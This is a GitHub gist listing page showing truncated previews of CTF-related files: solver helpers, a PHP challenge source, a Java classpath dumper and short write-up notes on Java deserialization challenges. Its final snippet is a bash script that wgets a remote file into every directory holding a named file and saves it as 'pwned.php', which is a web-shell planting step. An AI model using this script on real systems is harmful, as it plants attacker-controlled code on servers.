I hereby claim:
-
I am ducnhse130201 on github.
-
I am peterjson (https://keybase.io/peterjson) on keybase.
-
I have a public key ASBDaPh8oTicwrM-m7Nb3Nb2zQPR9QaDo9c-ggglX8reQgo
PeterJson ducnhse130201
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from telnetlib import * | |
| from hashlib import * | |
| def write(data): | |
| r.read_until('0) quit') | |
| r.write("1\n") | |
| r.read_until("Data? (In hex format)") | |
| r.write(data + "\n") | |
| def read(): |
ducnhse130201
/ keybase.md
Created
September 14, 2019 06:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import binascii | |
| from base64 import * | |
| def xor(data, key): | |
| from itertools import izip, cycle | |
| xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(data, cycle(key))) | |
| return xored |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| session_start(); | |
| include "config.php"; | |
| if(isset($_GET['debug'])) | |
| { | |
| show_source(__FILE__); | |
| die("..."); | |
| } | |
| if(!isset($_SESSION['token'])) |
ducnhse130201
/ source.php
Created
August 21, 2019 02:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| session_start(); | |
| include "config.php"; | |
| if(isset($_GET['debug'])) | |
| { | |
| show_source(__FILE__); | |
| die("..."); | |
| } | |
| if(!isset($_SESSION['token'])) |
ducnhse130201
/ get_jars.java
Created
July 1, 2019 10:11
get_jars.java (dump classpath from manifest)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.company; | |
| import java.io.*; | |
| import java.net.MalformedURLException; | |
| import java.net.URL; | |
| import java.nio.file.Files; | |
| import java.nio.file.Path; | |
| import java.nio.file.Paths; | |
| import java.util.List; | |
| import java.util.jar.Attributes; |
ducnhse130201
/ note_mates_2018_round_5_wutfaces.java
Last active
June 18, 2019 14:02
Short write-up and note for mates_2018_round_5_wutfaces
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- some notes about mates ctf 2018 round 5(wutfaces) --- | |
| [+] as always read carefully and understand from original write-ups from author blog | |
| [+] https://web.archive.org/web/20190501081457/https://tint0.com/matesctf-2018-wutfaces-cve-2013-2165/ | |
| [+] https://web.archive.org/web/20190501081357/https://tint0.com/when-el-injection-meets-java-deserialization/ | |
| [+] Things you need to do if you want to understand | |
| [+] get source and code review | |
| [+] debug if needed | |
| [+] and practice makes perfect |
ducnhse130201
/ note_web3_whitehat_final_2018.java
Last active
June 15, 2019 08:01
Short write-up and note for web3_whitehat_final_2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] web3 whitehat_final short write-up [+] | |
| [+] Read this first (write-up from author): https://medium.com/nightst0rm/writeup-web03-whitehat-grand-prix-2018-java-ssrf-java-deserialization-to-sql-injection-c20b211ddd91 | |
| [+] download this: https://docs.google.com/document/d/1VGLVi63DfIsopJSZJCFNDgz_2wPReAuvLNhDKR9JMH8/ and try to understand the code | |
| [+] debug if you stuck somewhere or you can contact me :> | |
| [+] If you want to rebuild the challenge contact me and i will give you source code |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ./remote server port 'menu string' | |
| touch "$1" || (echo "Cannot create file named $1" && exit 1) | |
| exec > "$1" | |
| echo 'from pwn import *' | |
| echo '' | |
| echo -e "HOST, PORT = \"$2\", \"$3\"" | |
| if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| OUTPUT="$(find / -type f -name $1 2>&1 | grep -v "Permission denied" | sed 's/'$1'//g')" | |
| while IFS= read | |
| do | |
| value="${REPLY}pwned.php" | |
| wget $2 -O $value | |
| done <<< "$OUTPUT" | |
NewerOlder